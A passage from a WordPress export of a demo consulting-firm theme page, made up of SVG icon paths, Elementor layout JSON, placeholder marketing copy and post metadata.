C512,208.935,495.445,192.33,473.492,189.736z M492,283.63c0,9.291-8.966,17.357-20.854,18.763l-28.704,3.396    c-3.897,0.461-7.165,3.16-8.354,6.9c-3.183,10.008-7.246,19.808-12.073,29.128c-1.807,3.487-1.406,7.709,1.026,10.792    l17.904,22.706c7.413,9.403,8.049,21.448,1.479,28.017l-39.082,39.083c-6.57,6.569-18.614,5.934-28.016-1.479l-22.706-17.903    c-3.083-2.431-7.303-2.833-10.792-1.026c-9.325,4.831-19.128,8.895-29.136,12.078c-3.74,1.189-6.439,4.457-6.9,8.355    l-3.396,28.705c-1.407,11.89-9.474,20.856-18.765,20.856H228.36c-9.292,0-17.359-8.967-18.765-20.857l-3.394-28.706    c-0.461-3.897-3.159-7.166-6.899-8.355c-10.006-3.183-19.806-7.246-29.129-12.076c-1.451-0.752-3.029-1.121-4.598-1.121    c-2.204,0-4.392,0.727-6.193,2.149l-22.706,17.902c-9.403,7.414-21.448,8.047-28.016,1.479l-39.082-39.083    c-6.571-6.57-5.935-18.614,1.479-28.016l17.904-22.707c2.431-3.084,2.833-7.306,1.026-10.792    c-4.827-9.319-8.889-19.12-12.073-29.128c-1.189-3.74-4.457-6.439-8.354-6.9l-28.705-3.396C28.966,300.987,20,292.921,20,283.63    v-55.271c0-9.291,8.967-17.358,20.857-18.764l28.706-3.394c3.898-0.461,7.166-3.159,8.355-6.899    c3.183-10.006,7.246-19.807,12.075-29.129c1.807-3.486,1.406-7.708-1.026-10.791l-17.902-22.706    c-7.414-9.402-8.049-21.446-1.479-28.016l39.081-39.083c6.569-6.57,18.615-5.935,28.017,1.48l22.706,17.904    c3.083,2.431,7.304,2.834,10.791,1.027c9.318-4.827,19.115-8.888,29.12-12.071c3.74-1.189,6.438-4.457,6.899-8.355l3.394-28.705    C211.001,28.967,219.067,20,228.359,20h55.271c9.291,0,17.358,8.966,18.764,20.855l3.396,28.705c0.461,3.898,3.16,7.166,6.9,8.355    c10.005,3.181,19.806,7.244,29.128,12.073c3.484,1.807,7.708,1.406,10.792-1.026l22.706-17.904    c9.404-7.412,21.448-8.051,28.017-1.48l39.083,39.082c6.569,6.57,5.933,18.614-1.479,28.016l-17.903,22.707    c-2.431,3.084-2.833,7.305-1.026,10.792c4.827,9.315,8.889,19.115,12.075,29.127c1.189,3.74,4.457,6.439,8.355,6.899l28.706,3.394    h-0.001c11.89,1.406,20.857,9.473,20.857,18.764V283.63z"></path>
	</g>
</g>
<g>
<g>
		<path d="M255.999,94.28c-89.173,0-161.721,72.548-161.721,161.721c0,35.631,11.362,69.426,32.86,97.729    c20.797,27.382,50.325,47.78,83.142,57.435c5.301,1.56,10.856-1.473,12.416-6.771c1.559-5.298-1.472-10.857-6.771-12.416    C156.078,374.37,114.279,318.454,114.279,256c0-78.145,63.575-141.721,141.721-141.721S397.721,177.855,397.721,256    c0,64.606-43.619,121.026-106.076,137.203c-5.346,1.385-8.558,6.842-7.173,12.188c1.167,4.506,5.226,7.495,9.674,7.495    c0.831,0,1.674-0.104,2.515-0.322C367.94,394.102,417.721,329.72,417.721,256C417.721,166.827,345.172,94.28,255.999,94.28z"></path>
	</g>
</g>
<g>
<g>
		<path d="M334.324,302.94L266,251.038v-44.663c0-5.523-4.478-10-10-10c-5.522,0-10,4.477-10,10V256    c0,3.126,1.462,6.072,3.952,7.962l72.275,54.903c1.809,1.374,3.933,2.038,6.041,2.038c3.019,0,6.003-1.361,7.97-3.951    C339.579,312.554,338.722,306.281,334.324,302.94z"></path>
	</g>
</g>
<g>
<g>
<circle cx="256" cy="164.02" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="252.36" cy="407.72" r="10"></circle>
</g>
</g>
<h5><a href="#">Planning</a></h5>
We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled

<a href="#" class="link-details"> Explore More </a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
		<path d="M489.129,42.371h-32.011V10c0-5.523-4.477-10-10-10s-10,4.477-10,10v38.237l-41.806,41.92    c-42.173-38.385-96.385-59.418-153.76-59.418c-61.083,0-118.511,23.787-161.703,66.979C36.657,140.91,12.87,198.338,12.87,259.421    s23.787,118.511,66.979,161.703c6.719,6.719,13.783,12.967,21.151,18.73l-55.074,55.074c-3.905,3.905-3.905,10.237,0,14.143    c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929l57.452-57.453c36.629,23.742,79.348,36.485,124.031,36.485    c44.901,0,87.818-12.868,124.566-36.833l57.801,57.801c1.953,1.952,4.512,2.929,7.071,2.929c2.559,0,5.119-0.977,7.071-2.929    c3.905-3.905,3.906-10.237,0-14.143l-55.467-55.467c7.19-5.656,14.092-11.769,20.661-18.337    c43.192-43.192,66.979-100.62,66.979-161.703c0-34.789-7.614-68.199-22.63-99.303c-2.401-4.974-8.381-7.06-13.353-4.658    c-4.974,2.401-7.059,8.379-4.658,13.353c13.696,28.37,20.641,58.855,20.641,90.608c0,115.068-93.615,208.683-208.683,208.683    S32.867,374.49,32.867,259.421c0-115.068,93.615-208.683,208.683-208.683c52.045,0,101.242,18.958,139.627,53.59l-35.099,35.195    c-28.976-25.325-65.717-39.171-104.527-39.171c-87.711,0-159.069,71.358-159.069,159.069s71.36,159.069,159.071,159.069    s159.069-71.358,159.069-159.069c0-14.146-1.859-28.178-5.527-41.708c-6.436-23.746-18.393-45.726-34.797-64.125l42.276-42.391    c0.013-0.013,0.028-0.024,0.041-0.037c0.012-0.012,0.021-0.025,0.033-0.036l48.621-48.753h37.861c5.523,0,10-4.477,10-10    S494.652,42.371,489.129,42.371z M375.792,222.945c3.206,11.825,4.831,24.097,4.831,36.476    c0,76.683-62.386,139.069-139.069,139.069s-139.069-62.387-139.069-139.069s62.386-139.069,139.069-139.069    c33.479,0,65.202,11.779,90.375,33.362l-41.285,41.397c-13.628-10.428-30.644-16.643-49.09-16.643    c-44.637,0-80.953,36.315-80.953,80.953s36.315,80.953,80.953,80.953s80.953-36.315,80.953-80.953    c0-18.997-6.594-36.473-17.592-50.297l41.232-41.344C360.089,183.686,370.271,202.573,375.792,222.945z M235.828,264.236    c1.952,1.946,4.507,2.919,7.062,2.919c2.563,0,5.127-0.979,7.081-2.938l40.71-40.821c7.426,10.1,11.825,22.556,11.825,36.025    c0,33.609-27.343,60.953-60.953,60.953c-33.61,0-60.953-27.344-60.953-60.953s27.343-60.953,60.953-60.953    c12.935,0,24.933,4.062,34.81,10.961l-40.554,40.664C231.909,254.004,231.917,260.335,235.828,264.236z"></path>
	</g>
</g>
<g>
<g>
<circle cx="419.22" cy="133.64" r="10"></circle>
</g>
</g>
<h5><a href="#">Strategy</a></h5>
We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled

<a href="#" class="link-details"> Explore More </a>
<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Layer_1" x="0px" y="0px" viewBox="0 0 512 512" style="enable-background:new 0 0 512 512;" xml:space="preserve"></svg>
<g>
<g>
<circle cx="87.43" cy="406.69" r="10"></circle>
</g>
</g>
<g>
<g>
<circle cx="470.4" cy="287.44" r="10"></circle>
</g>
</g>
<g>
<g>
		<path d="M354.647,212.344h-5.797h-3.761h-5.797c-4.854,0-8.802-3.948-8.802-8.802v-8.931c0.001-4.854,3.949-8.802,8.802-8.802    h17.012c3.939,0,7.145,3.204,7.145,7.144c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10c0-14.743-11.818-26.771-26.479-27.127    v-8.584c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10v8.669c-14.798,1.188-26.479,13.602-26.479,28.7v8.931    c0,15.881,12.921,28.802,28.802,28.802h5.797h3.761h5.797c4.854,0,8.802,3.948,8.802,8.801v8.932c0,4.853-3.948,8.801-8.802,8.801    h-17.012c-3.939,0-7.145-3.204-7.145-7.144c0-5.522-4.478-10-10-10c-5.522,0-10,4.478-10,10c0,14.744,11.819,26.771,26.479,27.127    v8.584c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-8.669c14.798-1.188,26.479-13.601,26.479-28.699v-8.932    C383.449,225.264,370.528,212.344,354.647,212.344z"></path>
	</g>
</g>
<g>
<g>
		<path d="M499.899,339.009c-4.115-9.319-11.613-16.479-21.112-20.159c-9.499-3.68-19.864-3.442-29.183,0.675    c-0.05,0.021-0.1,0.044-0.148,0.066l-62.989,29.048c-5.016,2.313-7.206,8.254-4.894,13.269c2.313,5.016,8.255,7.205,13.269,4.894    l62.908-29.011c4.415-1.927,9.317-2.03,13.813-0.291c4.518,1.751,8.083,5.155,10.04,9.588c1.958,4.433,2.071,9.361,0.321,13.879    c-1.751,4.519-5.155,8.084-9.588,10.041l-128.9,56.914c-20.326,8.975-43.397,8.453-63.301-1.435l-47.185-23.441    c-25.238-12.539-54.498-13.204-80.277-1.819l-0.6,0.264l-34.973-79.21l48.628-21.47c23.239-10.261,49.169-11.087,73.012-2.332    l94.885,34.845c8.475,3.112,12.992,12.594,10.069,21.135c-2.978,8.704-12.491,13.387-21.205,10.44l-73.375-24.818    c-5.233-1.77-10.907,1.037-12.677,6.269c-1.77,5.232,1.037,10.907,6.269,12.677l73.375,24.818    c3.88,1.313,7.831,1.936,11.721,1.936c15.283,0,29.606-9.62,34.816-24.848c6.413-18.746-3.501-39.553-22.099-46.382    l-94.885-34.845c-6.382-2.344-12.888-4.115-19.454-5.321v-55.277c0-54.504,44.343-98.847,98.847-98.847h36.524    c54.505,0,98.848,44.343,98.848,98.847v26.061c0,5.522,4.478,10,10,10c5.522,0,10-4.478,10-10v-26.061    c0-57.721-41.365-105.956-96.008-116.636V72.349l25.267-43.222c1.429-2.443,1.755-5.378,0.897-8.075    c-0.858-2.697-2.817-4.905-5.394-6.076l-30.99-14.08c-2.373-1.078-5.072-1.187-7.523-0.305l-22.995,8.276l-20.396-8.153    c-2.345-0.936-4.956-0.951-7.312-0.044l-32.428,12.511c-2.698,1.041-4.813,3.2-5.801,5.919c-0.986,2.719-0.748,5.731,0.655,8.261    l24.881,44.867v30.038c-55.169,10.258-97.072,58.744-97.072,116.84v53.36c-16.52-0.156-33.022,3.199-48.53,10.046l-48.99,21.63    c-2.806-4.199-6.808-7.445-11.615-9.307c-6.172-2.392-12.907-2.236-18.938,0.427l-63.29,27.733    c-3.637,1.594-5.986,5.188-5.986,9.159V502c0,3.473,1.802,6.697,4.76,8.518c1.603,0.985,3.419,1.482,5.24,1.482    c1.542,0,3.088-0.356,4.509-1.074l122.873-62.071c5.926-2.698,10.477-7.518,12.833-13.6c1.925-4.969,2.199-10.302,0.839-15.352    l0.865-0.382c20.327-8.977,43.401-8.454,63.301,1.435l47.185,23.442c25.239,12.536,54.498,13.199,80.277,1.818l128.9-56.914    c9.319-4.114,16.479-11.612,20.159-21.111C504.252,358.692,504.013,348.328,499.899,339.009z M364.391,100.259h-2.84h-36.524    h-1.775V79.641h41.139V100.259z M301.431,27.704l18.049-6.961l20.275,8.105c2.272,0.908,4.798,0.953,7.099,0.123l22.744-8.187    l17.201,7.815l-18.146,31.04h-49.512L301.431,27.704z M137.868,430.678c-0.158,0.07-0.315,0.145-0.47,0.223L28.831,485.745    v-40.524l28.113-13.805c4.958-2.435,7.003-8.427,4.569-13.384c-2.435-4.958-8.425-7.005-13.384-4.569l-19.299,9.476V338.69    l57.329-25.122c1.575-0.694,2.97-0.352,3.661-0.084c0.689,0.268,1.951,0.951,2.647,2.528l2.292,5.19    c0.001,0.002,0.001,0.004,0.002,0.006c0.001,0.002,0.002,0.004,0.003,0.006l45.546,103.154    C141.377,426.782,140.282,429.612,137.868,430.678z"></path>
	</g>
</g>
<h5><a href="#">Support</a></h5>
We’ve been a strategy thought leader for nearly five decades
and we bring unrivaled

<a href="#" class="link-details"> Explore More </a>
<h2>Looking for a First-Class Finance Firm?</h2>
We welcome and celebrate different perspectives to help our firm, our clients and our people.

<a href="http://wpdemo.archiwp.com/maxbizz/contact-us">get in touch</a>
reliable &amp; safe
<h3>Our Strategy Development</h3>
<ul>
 	<li data-tab="tab-1827">Research</li>
 	<li data-tab="tab-2827">aproach</li>
 	<li data-tab="tab-3827">result</li>
</ul>
We are working in the format of an outsourcing project office. We assume operational coordination and control over the compliance with all project implementation parameters that ensures the execution of works on time.

Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.

We can definitely define the provided level and range of Synergy Development Consulting as a full-cycle support. Therefore, we treat each client as an equal partner in the long term. Our team consists of talented and motivated people who are united by love to their work!

Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.

Successful experience of experts in structuring investment projects, developing and implementing construction, developers and energy projects, restructuring programs, etc. provides a positive impact on your company profitability.

Integrated career development, business consulting and digital media solutions connect your vision to results. Instead of quick-fix, out of the box, buy-in-bulk products, I develop highly customized solutions.

<a href="#">Explore More </a>
<img width="466" height="296" src="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart1-service-home3.png 466w, https://maxbizz.s3.amazonaws.com/images/chart1-service-home3-300x191.png 300w" sizes="(max-width: 466px) 100vw, 466px">]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>959</wp:post_id>
		<wp:post_date><![CDATA[2020-09-17 04:03:11]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-17 04:03:11]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[organizational-audit]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>868</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.13]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"41c2f83","elType":"section","settings":{"padding":{"unit":"px","top":"90","right":"0","bottom":"0","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"99e32eb","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"bbf118c","elType":"section","settings":{"layout":"full_width","gap":"extended","structure":"20","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/slider2-home2.jpg","id":1317},"background_position":"center center","background_position_mobile":"center left","background_repeat":"no-repeat","background_size":"cover","background_size_tablet":"cover","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"120","right":"0","bottom":"120","left":"100","isLinked":false},"padding_tablet":{"unit":"px","top":"110","right":"0","bottom":"110","left":"60","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"30","isLinked":false}},"elements":[{"id":"5e47caf","elType":"column","settings":{"_column_size":50,"_inline_size":44.63600000000000278532752417959272861480712890625,"_inline_size_tablet":70,"_inline_size_mobile":100},"elements":[{"id":"4376d3b","elType":"widget","settings":{"title":"how we help","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"bold","typography_text_transform":"uppercase","_padding":{"unit":"px","top":"0","right":"0","bottom":"18","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"1e1f3f6","elType":"widget","settings":{"title":"Align Costs with Strategy & Focus on Growth","header_size":"h1","title_color":"#1B1D21","typography_typography":"custom","typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"bb56b1a","elType":"widget","settings":{"btn_style":"dark","text":"get in touch"},"elements":[],"widgetType":"ibutton"}],"isInner":true},{"id":"a57cea8","elType":"column","settings":{"_column_size":50,"_inline_size":55.36399999999999721467247582040727138519287109375,"_inline_size_tablet":30,"_inline_size_mobile":100},"elements":[],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"c25f6a6","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"95","right":"0","bottom":"130","left":"0","isLinked":false},"padding_tablet":{"unit":"px","top":"95","right":"0","bottom":"90","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"2385c34","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"b25f0cc","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"cf25bf5","elType":"widget","settings":{"ot_accs":[{"acc_title":"In what areas do you provide management consulting?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"cab9896"},{"acc_title":"In which countries do you provide consulting services?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"d505a0a"},{"acc_title":"How is a consulting project started and organized?","acc_content":"<p>Our associate consultants specialize in a range of business areas. These include strategic planning, issues resolution, culture assessment, board effectiveness, retention.<\/p>","_id":"5303f19"}],"_padding":{"unit":"px","top":"0","right":"50","bottom":"0","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"iaccordions"}],"isInner":false},{"id":"018e51c","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"9b39923","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart-project-home3.png","id":1691},"image_size":"full","align":"left","_margin":{"unit":"px","top":"0","right":"0","bottom":"-30","left":"-30","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":false}],"isInner":false},{"id":"a1952ca","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-service-detail2.jpg","id":970},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"80","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"ec49fa5","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"1b5272a","elType":"widget","settings":{"sub":"our benefits","title":"Why Clients Choose Us","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"25","left":"0","isLinked":false},"is_highlight":"","stitle_typography_typography":"custom","stitle_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"iheading"},{"id":"2d7dbb6","elType":"section","settings":{"gap":"extended","structure":"40","layout":"full_width"},"elements":[{"id":"d6df67f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"80fa6cf","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/chart.svg","id":653},"library":"svg"},"title":"Consulting","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":32,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"title_typography_font_weight":"bold","des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#D92300","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"a9e257f","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"4ea034c","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/clock.svg","id":659},"library":"svg"},"title":"Planning","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#D92300","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"f4ad5a2","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"70ad7d9","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/aim.svg","id":660},"library":"svg"},"title":"Strategy","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"bg_box":"#FFFFFF","bg_hover_box":"#D92300","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true},{"id":"2b09e55","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"margin_tablet":{"unit":"%","top":"","right":"","bottom":"","left":"","isLinked":true},"margin_mobile":{"unit":"%","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"a5a983f","elType":"widget","settings":{"align":"left","icon_font":{"value":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/money.svg","id":663},"library":"svg"},"title":"Support","des":"We\u2019ve been a strategy thought leader for nearly five decades\nand we bring unrivaled ","btn_text":"<i class=\"ot-flaticon-trajectory\"><\/i> Explore More ","is_line":"","box_padding":{"unit":"px","top":"29","right":"29","bottom":"29","left":"29","isLinked":true},"bg_hover_icon_bg":"#FFFFFF1A","bg_hover_des_color":"#FFFFFF","is_border":"","icon_space":{"unit":"px","size":30,"sizes":[]},"icon_size":{"unit":"px","size":34,"sizes":[]},"icon_bg_width":{"unit":"px","size":65,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"des_color":"#60626D","des_typography_typography":"custom","des_typography_font_family":"Open Sans","des_typography_font_size":{"unit":"px","size":15,"sizes":[]},"bg_box":"#FFFFFF","bg_hover_box":"#D92300","bg_hover_icon_color":"#FFFFFF","bg_hover_link_btn_color":"#FFFFFF","icon_bg":"#D923001A"},"elements":[],"widgetType":"iiconbox1"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"d701907","elType":"section","settings":{"gap":"extended","structure":"22","background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-faq.jpg","id":571},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"52","right":"0","bottom":"55","left":"0","isLinked":false},"content_position":"middle"},"elements":[{"id":"b3a944d","elType":"column","settings":{"_column_size":66,"_inline_size":null},"elements":[{"id":"4c35005","elType":"widget","settings":{"title":"Looking for a First-Class Finance Firm?","title_color":"#FFFFFF","typography_typography":"custom","typography_font_size":{"unit":"px","size":40,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"10","left":"0","isLinked":false},"typography_font_size_mobile":{"unit":"px","size":30,"sizes":[]}},"elements":[],"widgetType":"heading"},{"id":"cab11a6","elType":"widget","settings":{"editor":"<p>We welcome and celebrate different perspectives to help our firm, our clients and our people.<\/p>","text_color":"#FFFFFF","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"27d6af4","elType":"column","settings":{"_column_size":33,"_inline_size":null},"elements":[{"id":"12e765f","elType":"widget","settings":{"align":"right","align_mobile":"left","text":"get in touch","link":{"url":"http:\/\/wpdemo.archiwp.com\/maxbizz\/contact-us","is_external":"","nofollow":"","custom_attributes":""},"_padding":{"unit":"px","top":"5","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[],"widgetType":"ibutton"}],"isInner":false}],"isInner":false},{"id":"f7ba0c1","elType":"section","settings":{"structure":"20","padding":{"unit":"px","top":"100","right":"0","bottom":"100","left":"0","isLinked":false},"gap":"extended","content_position":"bottom","padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"cae27a3","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[{"id":"cafb16e","elType":"widget","settings":{"sub":"reliable & safe","title":"Our Strategy 